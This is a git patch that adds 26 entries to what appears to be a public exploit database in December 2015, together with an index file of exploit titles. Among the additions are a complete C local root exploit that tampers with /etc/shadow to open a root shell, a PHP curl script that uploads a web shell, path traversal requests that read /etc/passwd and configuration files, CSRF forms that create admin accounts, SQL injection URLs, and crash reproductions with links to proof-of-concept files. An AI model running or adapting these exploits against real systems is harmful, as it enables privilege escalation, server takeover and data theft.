From 4ac8afedb70812bb8d3e247f84d128df335f7b45 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 18 Dec 2015 05:02:23 +0000 Subject: [PATCH] DB: 2015-12-18 26 new exploits --- files.csv | 26 ++++++ platforms/android/dos/39023.txt | 31 +++++++ platforms/android/dos/39024.txt | 33 +++++++ platforms/linux/local/39010.c | 97 ++++++++++++++++++++ platforms/multiple/remote/39018.txt | 23 +++++ platforms/php/webapps/38984.txt | 132 ++++++++++++++++++++++++++++ platforms/php/webapps/39011.txt | 7 ++ platforms/php/webapps/39012.txt | 7 ++ platforms/php/webapps/39013.html | 14 +++ platforms/php/webapps/39014.txt | 31 +++++++ platforms/php/webapps/39015.txt | 9 ++ platforms/php/webapps/39016.txt | 7 ++ platforms/php/webapps/39017.txt | 51 +++++++++++ platforms/php/webapps/39028.txt | 11 +++ platforms/php/webapps/39029.txt | 29 ++++++ platforms/php/webapps/39030.txt | 29 ++++++ platforms/php/webapps/39031.html | 30 +++++++ platforms/php/webapps/39032.txt | 38 ++++++++ platforms/win32/dos/39026.txt | 11 +++ platforms/win32/dos/39027.txt | 11 +++ platforms/windows/dos/39019.txt | 48 ++++++++++ platforms/windows/dos/39020.txt | 49 +++++++++++ platforms/windows/dos/39021.txt | 21 +++++ platforms/windows/dos/39022.txt | 47 ++++++++++ platforms/windows/dos/39025.txt | 9 ++ platforms/windows/remote/39008.py | 57 ++++++++++++ platforms/windows/remote/39009.py | 57 ++++++++++++ 27 files changed, 915 insertions(+) create mode 100755 platforms/android/dos/39023.txt create mode 100755 platforms/android/dos/39024.txt create mode 100755 platforms/linux/local/39010.c create mode 100755 platforms/multiple/remote/39018.txt create mode 100755 platforms/php/webapps/38984.txt create mode 100755 platforms/php/webapps/39011.txt create mode 100755 platforms/php/webapps/39012.txt create mode 100755 platforms/php/webapps/39013.html create mode 100755 platforms/php/webapps/39014.txt create mode 100755 platforms/php/webapps/39015.txt create mode 100755 platforms/php/webapps/39016.txt create mode 100755 platforms/php/webapps/39017.txt create mode 100755 platforms/php/webapps/39028.txt create mode 100755 platforms/php/webapps/39029.txt create mode 100755 platforms/php/webapps/39030.txt create mode 100755 platforms/php/webapps/39031.html create mode 100755 platforms/php/webapps/39032.txt create mode 100755 platforms/win32/dos/39026.txt create mode 100755 platforms/win32/dos/39027.txt create mode 100755 platforms/windows/dos/39019.txt create mode 100755 platforms/windows/dos/39020.txt create mode 100755 platforms/windows/dos/39021.txt create mode 100755 platforms/windows/dos/39022.txt create mode 100755 platforms/windows/dos/39025.txt create mode 100755 platforms/windows/remote/39008.py create mode 100755 platforms/windows/remote/39009.py diff --git a/files.csv b/files.csv index 6c77f10a4..5bf913883 100755 --- a/files.csv +++ b/files.csv @@ -35239,6 +35239,7 @@ id,file,description,date,author,platform,type,port 38981,platforms/php/webapps/38981.txt,"Ovidentia absences Module 2.64 - Remote File Inclusion",2015-12-15,bd0rk,php,webapps,80 38982,platforms/jsp/remote/38982.rb,"ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability",2015-12-15,metasploit,jsp,remote,8020 38983,platforms/java/remote/38983.rb,"Jenkins CLI RMI Java Deserialization Vulnerability",2015-12-15,metasploit,java,remote,8080 +38984,platforms/php/webapps/38984.txt,"Tequila File Hosting 1.5 - Multiple Vulnerabilities",2015-12-15,"Ashiyane Digital Security Team",php,webapps,80 38985,platforms/php/webapps/38985.txt,"Dredge School Administration System /DSM/loader.php Id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 38986,platforms/php/webapps/38986.txt,"Dredge School Administration System /DSM/loader.php Account Information Disclosure",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 38987,platforms/php/webapps/38987.html,"Dredge School Administration System /DSM/loader.php Admin Account Manipulation CSRF",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -35261,3 +35262,28 @@ id,file,description,date,author,platform,type,port 39005,platforms/multiple/dos/39005.txt,"Wireshark - AirPDcapPacketProcess Stack-Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos,0 39006,platforms/multiple/dos/39006.txt,"Wireshark - getRate Stack-Based Out-of-Bounds Read",2015-12-16,"Google Security Research",multiple,dos,0 39007,platforms/java/remote/39007.txt,"FireEye Wormable Remote Code Execution in MIP JAR Analysis",2015-12-16,"Tavis Ormandy and Natalie Silvanovich",java,remote,0 +39008,platforms/windows/remote/39008.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request SEH Buffer Overflow",2015-12-16,ArminCyber,windows,remote,80 +39009,platforms/windows/remote/39009.py,"Easy File Sharing Web Server 7.2 - HEAD HTTP Request SEH Buffer Overflow",2015-12-16,ArminCyber,windows,remote,80 +39010,platforms/linux/local/39010.c,"Gentoo Local Priv Escalation in QEMU",2015-12-17,zx2c4,linux,local,0 +39011,platforms/php/webapps/39011.txt,"UAEPD Shopping Script /products.php Multiple Parameter SQL Injection",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39012,platforms/php/webapps/39012.txt,"UAEPD Shopping Script /news.php id Parameter SQL Injection",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39013,platforms/php/webapps/39013.html,"Built2Go PHP Shopping Admin Password Cross Site Request Forgery Vulnerability",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39014,platforms/php/webapps/39014.txt,"EZGenerator Local File Disclosure and Cross Site Request Forgery Vulnerabilities",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39015,platforms/php/webapps/39015.txt,"Atmail Webmail Server Email Body HTML Injection Vulnerability",2014-01-14,"Zhao Liang",php,webapps,0 +39016,platforms/php/webapps/39016.txt,"Joomla! Almond Classifieds Component Arbitrary File Upload Vulnerability",2014-01-10,DevilScreaM,php,webapps,0 +39017,platforms/php/webapps/39017.txt,"Zen Cart 1.5.4 - Local File Inclusion",2015-12-17,"High-Tech Bridge SA",php,webapps,80 +39018,platforms/multiple/remote/39018.txt,"Oracle Supply Chain Products Suite Remote Security Vulnerability",2014-01-14,Oracle,multiple,remote,0 +39019,platforms/windows/dos/39019.txt,"Adobe Flash TextField.antiAliasType Setter - Use-After-Free",2015-12-17,"Google Security Research",windows,dos,0 +39020,platforms/windows/dos/39020.txt,"Adobe Flash TextField.gridFitType Setter - Use-After-Free",2015-12-17,"Google Security Research",windows,dos,0 +39021,platforms/windows/dos/39021.txt,"Adobe Flash MovieClip.lineStyle - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0 +39022,platforms/windows/dos/39022.txt,"Adobe Flash GradientFill - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0 +39023,platforms/android/dos/39023.txt,"Samsung Galaxy S6 Samsung Gallery - GIF Parsing Crash",2015-12-17,"Google Security Research",android,dos,0 +39024,platforms/android/dos/39024.txt,"Samsung Galaxy S6 Samsung Gallery - Bitmap Decoding Crash",2015-12-17,"Google Security Research",android,dos,0 +39025,platforms/windows/dos/39025.txt,"Windows Kernel win32k!OffsetChildren - Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos,0 +39026,platforms/win32/dos/39026.txt,"win32k Desktop and Clipboard - Null Pointer Derefence",2015-12-17,"Nils Sommer",win32,dos,0 +39027,platforms/win32/dos/39027.txt,"win32k Clipboard Bitmap - Use-After-Free Vulnerability",2015-12-17,"Nils Sommer",win32,dos,0 +39028,platforms/php/webapps/39028.txt,"Joomla! Sexy Polling Extension 'answer_id' Parameter SQL Injection Vulnerability",2014-01-16,"High-Tech Bridge",php,webapps,0 +39029,platforms/php/webapps/39029.txt,"bloofoxCMS /bloofox/index.php username Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39030,platforms/php/webapps/39030.txt,"bloofoxCMS /bloofox/admin/index.php username Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39031,platforms/php/webapps/39031.html,"bloofoxCMS /admin/index.php Admin User Creation CSRF",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39032,platforms/php/webapps/39032.txt,"bloofoxCMS /admin/include/inc_settings_editor.php fileurl Parameter Local File Inclusion",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 diff --git a/platforms/android/dos/39023.txt b/platforms/android/dos/39023.txt new file mode 100755 index 000000000..bccc807e4 --- /dev/null +++ b/platforms/android/dos/39023.txt @@ -0,0 +1,31 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=500 + +There is a crash when the Samsung Gallery application load the attached GIF, colormap.gif. + +D/skia (10905): GIF - Parse error +D/skia (10905): --- decoder->decode returned false +F/libc (10905): Fatal signal 11 (SIGSEGV), code 2, fault addr 0x89f725ac in tid 11276 (thread-pool-0) +I/DEBUG ( 2958): pid: 10905, tid: 11276, name: thread-pool-0 >>> com.sec.android.gallery3d <<< +I/DEBUG ( 2958): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x89f725ac +I/DEBUG ( 2958): x0 0000000000000001 x1 0000000089f725ac x2 0000000000000000 x3 00000000fff9038c +I/DEBUG ( 2958): x4 0000007f9c300000 x5 000000000000001f x6 0000000000000001 x7 0000007f9c620048 +I/DEBUG ( 2958): x8 0000000000000000 x9 0000000000000000 x10 0000000000000080 x11 0000000000003758 +I/DEBUG ( 2958): x12 0000000000000020 x13 0000000000000020 x14 00000000000000a5 x15 000000000000001f +I/DEBUG ( 2958): x16 00000000ffffe4e3 x17 00000000000000a5 x18 0000007f9c300000 x19 0000007f9c61fc00 +I/DEBUG ( 2958): x20 0000007f9c664080 x21 0000000089e76b2c x22 000000000000003b x23 0000000000000001 +I/DEBUG ( 2958): x24 0000000000000020 x25 0000000000000020 x26 0000000000000020 x27 0000007f9c664080 +I/DEBUG ( 2958): x28 00000000000001da x29 0000000032e89ae0 x30 0000007faad70e64 +I/DEBUG ( 2958): sp 0000007f9cfff170 pc 0000007faad72dbc pstate 0000000080000000 +I/DEBUG ( 2958): +I/DEBUG ( 2958): backtrace: +I/DEBUG ( 2958): #00 pc 000000000002ddbc /system/lib64/libSecMMCodec.so (ColorMap+200) +I/DEBUG ( 2958): #01 pc 000000000002be60 /system/lib64/libSecMMCodec.so (decodeGIF+340) +I/DEBUG ( 2958): #02 pc 000000000000c90c /system/lib64/libSecMMCodec.so (Java_com_sec_samsung_gallery_decoder_SecMMCodecInterface_nativeDecode+436) +I/DEBUG ( 2958): #03 pc 000000000042ec00 /system/priv-app/SecGallery2015/arm64/SecGallery2015.odex + +To reproduce, download the file and open it in Gallery + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39023.zip + diff --git a/platforms/android/dos/39024.txt b/platforms/android/dos/39024.txt new file mode 100755 index 000000000..55b0aec00 --- /dev/null +++ b/platforms/android/dos/39024.txt @@ -0,0 +1,33 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=497 + +Loading the bitmap bmp_memset.bmp can cause a crash due to a memset writing out of bounds. + +I/DEBUG ( 2961): pid: 12383, tid: 12549, name: thread-pool-1 >>> com.sec.android.gallery3d <<< +I/DEBUG ( 2961): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x89e84000 + +I/DEBUG ( 2961): x0 0000000089e8117c x1 00000000000000ff x2 00000000177fe13c x3 0000000089e8117c +I/DEBUG ( 2961): x4 0000000000000004 x5 0000007f65f42300 x6 0000000000000002 x7 ffffffffffffffff +I/DEBUG ( 2961): x8 0000000089e83ff0 x9 0000007f65f020b0 x10 000000000000003c x11 000000000000003b +I/DEBUG ( 2961): x12 0000007f65f02080 x13 00000000ffffffff x14 0000007f65f02080 x15 00000000000061e0 +I/DEBUG ( 2961): x16 0000007f6baccc10 x17 0000007f958f8d80 x18 0000007f9596da40 x19 0000007f65f0e180 +I/DEBUG ( 2961): x20 0000007f65f54020 x21 00000000002f0020 x22 0000000000000020 x23 0000000005e00400 +I/DEBUG ( 2961): x24 0000000000000004 x25 0000007f65f42300 x26 0000000000000020 x27 0000007f65f52080 +I/DEBUG ( 2961): x28 00000000000001da x29 0000000013071460 x30 0000007f6ba7e40c +I/DEBUG ( 2961): sp 0000007f66796130 pc 0000007f958f8e28 pstate 0000000020000000 +I/DEBUG ( 2961): +I/DEBUG ( 2961): backtrace: +I/InjectionManager(12532): Inside getClassLibPath caller +I/DEBUG ( 2961): #00 pc 0000000000019e28 /system/lib64/libc.so (memset+168) +I/DEBUG ( 2961): #01 pc 0000000000030408 /system/lib64/libSecMMCodec.so (sbmpd_decode_rle_complete+64) +I/DEBUG ( 2961): #02 pc 0000000000033440 /system/lib64/libSecMMCodec.so (DecodeFile+120) +I/DEBUG ( 2961): #03 pc 000000000000c90c /system/lib64/libSecMMCodec.so (Java_com_sec_samsung_gallery_decoder_SecMMCodecInterface_nativeDecode+436) +I/DEBUG ( 2961): #04 pc 000000000042ec00 /system/priv-app/SecGallery2015/arm64/SecGallery2015.odex + +To reproduce, download the file and open it in Gallery. + +This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39024.zip + diff --git a/platforms/linux/local/39010.c b/platforms/linux/local/39010.c new file mode 100755 index 000000000..70ce34001 --- /dev/null +++ b/platforms/linux/local/39010.c @@ -0,0 +1,97 @@ + +/* == virtfshell == + * + * Some distributions make virtfs-proxy-helper from QEMU either SUID or + * give it CAP_CHOWN fs capabilities. This is a terrible idea. While + * virtfs-proxy-helper makes some sort of flimsy check to make sure + * its socket path doesn't already exist, it is vulnerable to TOCTOU. + * + * This should spawn a root shell eventually on vulnerable systems. + * + * - zx2c4 + * 2015-12-12 + * + * + * zx2c4@thinkpad ~ $ lsb_release -i + * Distributor ID: Gentoo + * zx2c4@thinkpad ~ $ ./virtfshell + * == Virtfshell - by zx2c4 == + * [+] Trying to win race, attempt 749 + * [+] Chown'd /etc/shadow, elevating to root + * [+] Cleaning up + * [+] Spawning root shell + * thinkpad zx2c4 # whoami + * root + * + */ + +#include +#include +#include +#include +#include +#include +#include +#include + + +static int it_worked(void) +{ + struct stat sbuf = { 0 }; + stat("/etc/shadow", &sbuf); + return sbuf.st_uid == getuid() && sbuf.st_gid == getgid(); +} + +int main(int argc, char **argv) +{ + int fd; + pid_t pid; + char uid[12], gid[12]; + size_t attempts = 0; + + sprintf(uid, "%d", getuid()); + sprintf(gid, "%d", getgid()); + + printf("== Virtfshell - by zx2c4 ==\n"); + + printf("[+] Beginning race loop\n"); + + while (!it_worked()) { + printf("\033[1A\033[2K[+] Trying to win race, attempt %zu\n", ++attempts); + fd = inotify_init(); + unlink("/tmp/virtfshell/sock"); + mkdir("/tmp/virtfshell", 0777); + inotify_add_watch(fd, "/tmp/virtfshell", IN_CREATE); + pid = fork(); + if (pid == -1) + continue; + if (!pid) { + close(0); + close(1); + close(2); + execlp("virtfs-proxy-helper", "virtfs-proxy-helper", "-n", "-p", "/tmp", "-u", uid, "-g", gid, "-s", "/tmp/virtfshell/sock", NULL); + _exit(1); + } + read(fd, 0, 0); + unlink("/tmp/virtfshell/sock"); + symlink("/etc/shadow", "/tmp/virtfshell/sock"); + close(fd); + kill(pid, SIGKILL); + wait(NULL); + } + + printf("[+] Chown'd /etc/shadow, elevating to root\n"); + + system( "cp /etc/shadow /tmp/original_shadow;" + "sed 's/^root:.*/root::::::::/' /etc/shadow > /tmp/modified_shadow;" + "cat /tmp/modified_shadow > /etc/shadow;" + "su -c '" + " echo [+] Cleaning up;" + " cat /tmp/original_shadow > /etc/shadow;" + " chown root:root /etc/shadow;" + " rm /tmp/modified_shadow /tmp/original_shadow;" + " echo [+] Spawning root shell;" + " exec /bin/bash -i" + "'"); + return 0; +} \ No newline at end of file diff --git a/platforms/multiple/remote/39018.txt b/platforms/multiple/remote/39018.txt new file mode 100755 index 000000000..2aa8d567a --- /dev/null +++ b/platforms/multiple/remote/39018.txt @@ -0,0 +1,23 @@ +source: http://www.securityfocus.com/bid/64836/info + +Oracle Supply Chain Products Suite is prone to a remote vulnerability in Oracle Demantra Demand Management. + +The vulnerability can be exploited over the 'HTTP' protocol. The 'DM Others' sub component is affected. + +Attackers can exploit this issue to obtain sensitive information. + +This vulnerability affects the following supported versions: +12.2.0, 12.2.1, 12.2.2 + +POST /demantra/common/loginCheck.jsp/../../GraphServlet HTTP/1.1 +Host: target.com:8080 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 46 + +filename=C:/Program Files (x86)/Oracle Demantra Spectrum/Collaborator/demantra/WEB-INF/web.xml diff --git a/platforms/php/webapps/38984.txt b/platforms/php/webapps/38984.txt new file mode 100755 index 000000000..7ca6fce3c --- /dev/null +++ b/platforms/php/webapps/38984.txt @@ -0,0 +1,132 @@ +================================================================================ +Tequila File Hosting Arbitrary File Download +================================================================================ +# Vendor Homepage: http://codecanyon.net/item/tequila-file-hosting-script/7604312 +# Date: 16/12/2015 +# Author: Ashiyane Digital Security Team +# Version: 1.5 +# Contact: hehsan979@gmail.com +# Source: http://ehsansec.ir/advisories/tequila-disclose.txt +================================================================================ +# Description: +Tequila is a solid, safe, fast, simple and intuitive script which +allows companies or individuals to upload, manage and share their +files online. It is studied in every feature and was produced with +attention to every detail. + +# PoC : + +# Download Config +http://localhost/tequila/download.php?download.php?filename=files/../include/php/constants.php&name=file.php + +# Download passwd +http://localhost/tequila/download.php?filename=files/../../../../../etc/passwd&name=passwd + + +# (PHP Exploit): + + + +# Vulnerabile code: + + + +####################################################################### + +================================================================================ +Tequila File Hosting Unrestricted File Upload +================================================================================ + +# PoC : +First register in the site===> +http://localhost/tequila/register.php + +Next using this exploit : + + '/username', 'file' => '@shell.php'); + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, "http://localhost/tequila/upload.php"); + curl_setopt($ch, CURLOPT_POST, 1); + curl_setopt($ch, CURLOPT_POSTFIELDS, $postData ); + $buf = curl_exec ($ch); + curl_close($ch); + unset($ch); + echo $buf; + ?> + +or + + curl -i -F folder='/ehsann' -F file=@ehsan.png +http://localhost/tequila/upload.php + +Sheller uploaded. + +Path of shell : http://localhost/tequila/files/username/shell.php + +####################################################################### + +================================================================================ +Tequila File Hosting Coss Site Scripting +================================================================================ + +# PoC : +http://localhost/files.php?folder="> +http://easyhost.me/file.php?file="> + +================================================================================ +# Discovered By : Ehsan Hosseini (EhsanSec.ir) +================================================================================ diff --git a/platforms/php/webapps/39011.txt b/platforms/php/webapps/39011.txt new file mode 100755 index 000000000..b63fcb55a --- /dev/null +++ b/platforms/php/webapps/39011.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/64734/info + +UAEPD Shopping Cart Script is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. + +An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database. + +http://www.example.com/products.php?cat_id=4 \ No newline at end of file diff --git a/platforms/php/webapps/39012.txt b/platforms/php/webapps/39012.txt new file mode 100755 index 000000000..4e624aaa5 --- /dev/null +++ b/platforms/php/webapps/39012.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/64734/info + +UAEPD Shopping Cart Script is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. + +An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database. + +http://www.example.com/news.php?id=1 \ No newline at end of file diff --git a/platforms/php/webapps/39013.html b/platforms/php/webapps/39013.html new file mode 100755 index 000000000..a0efe1981 --- /dev/null +++ b/platforms/php/webapps/39013.html @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/64735/info + +Built2Go PHP Shopping is prone to a cross-site request-forgery vulnerability. + +Exploiting the issue will allow a remote attacker to use a victim's currently active session to change the victim's password. Successful exploits will compromise affected computers. + +
+ + + + + + +
\ No newline at end of file diff --git a/platforms/php/webapps/39014.txt b/platforms/php/webapps/39014.txt new file mode 100755 index 000000000..e0139c88e --- /dev/null +++ b/platforms/php/webapps/39014.txt @@ -0,0 +1,31 @@ +source: http://www.securityfocus.com/bid/64740/info + +EZGenerator is prone to a local file-disclosure vulnerability and a cross-site request-forgery vulnerability. + +An attacker may leverage these issues to perform unauthorized actions in the context of a logged-in user, or obtain sensitive information from local files on computers running the vulnerable application. This may aid in further attacks. + +Local File Disclosure: +===================== +www.example.com/utils.php?action=download&filename=file.php%00 + +CSRF [Add Admin]: +================ + +
+ + + + + + + + + + + +
+ + + + diff --git a/platforms/php/webapps/39015.txt b/platforms/php/webapps/39015.txt new file mode 100755 index 000000000..e1b2f8fa4 --- /dev/null +++ b/platforms/php/webapps/39015.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/64779/info + +Atmail Webmail Server is prone to an HTML-injection vulnerability. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. + +Atmail 7.1.3 is vulnerable; others versions may also be affected. + +